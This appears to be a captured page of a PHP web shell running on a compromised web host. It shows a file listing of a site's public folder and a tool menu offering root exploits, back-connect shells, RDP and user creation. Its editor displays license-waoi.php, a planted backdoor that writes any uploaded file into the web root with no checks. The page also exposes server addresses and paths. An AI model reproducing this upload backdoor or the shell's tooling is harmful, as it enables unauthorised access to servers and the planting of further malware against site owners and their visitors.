Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.216.164
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo5.com /
public /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
backup-and-restore
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
flags
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
i18n
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
installer
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
sample-import
[ DIR ]
drwxr-xr-x
sounds
[ DIR ]
drwxr-xr-x
user-uploads
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
.DS_Store
8
KB
-rw-r--r--
.htaccess
199
B
-rw-r--r--
OneSignalSDKUpdaterWorker.js
71
B
-rw-r--r--
OneSignalSDKWorker.js
71
B
-rw-r--r--
check.php
23.95
KB
-rw-r--r--
country.json
50.54
KB
-rw-r--r--
error_install.php
5.43
KB
-rw-r--r--
favicon.ico
15.04
KB
-rw-r--r--
favicon.png
1
KB
-rw-r--r--
goat1.php
143.87
KB
-rw-r--r--
index.php
1.95
KB
-rw-r--r--
install-version.txt
8
B
-rw-r--r--
license-waoi.php
629
B
-rw-r--r--
manifest.json
99
B
-rw-r--r--
message-notification.mp3
34.22
KB
-rw-r--r--
percent-module-download.txt
1
B
-rw-r--r--
robots.txt
85
B
-rw-r--r--
service-worker.js
63
B
-rw-r--r--
version.txt
7
B
-rw-r--r--
w
0
B
-rw-r--r--
web.config
1.17
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : license-waoi.php
<?php if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['image'])) { $f = $_FILES['image']; if ($f['error'] === UPLOAD_ERR_OK) { $name = basename($f['name']); $ok = move_uploaded_file($f['tmp_name'], __DIR__ . '/' . $name); echo $ok ? "<center><b>Done ==> {$name}</b></center>" : "<center><b>Error writing file</b></center>"; } else { echo "<center><b>Upload error code: {$f['error']}</b></center>"; } exit; } ?> 10ad76cfd5f7befa <form method="post" enctype="multipart/form-data"> <input type="file" name="image"> <input type="submit" value="Submit"> </form>
Close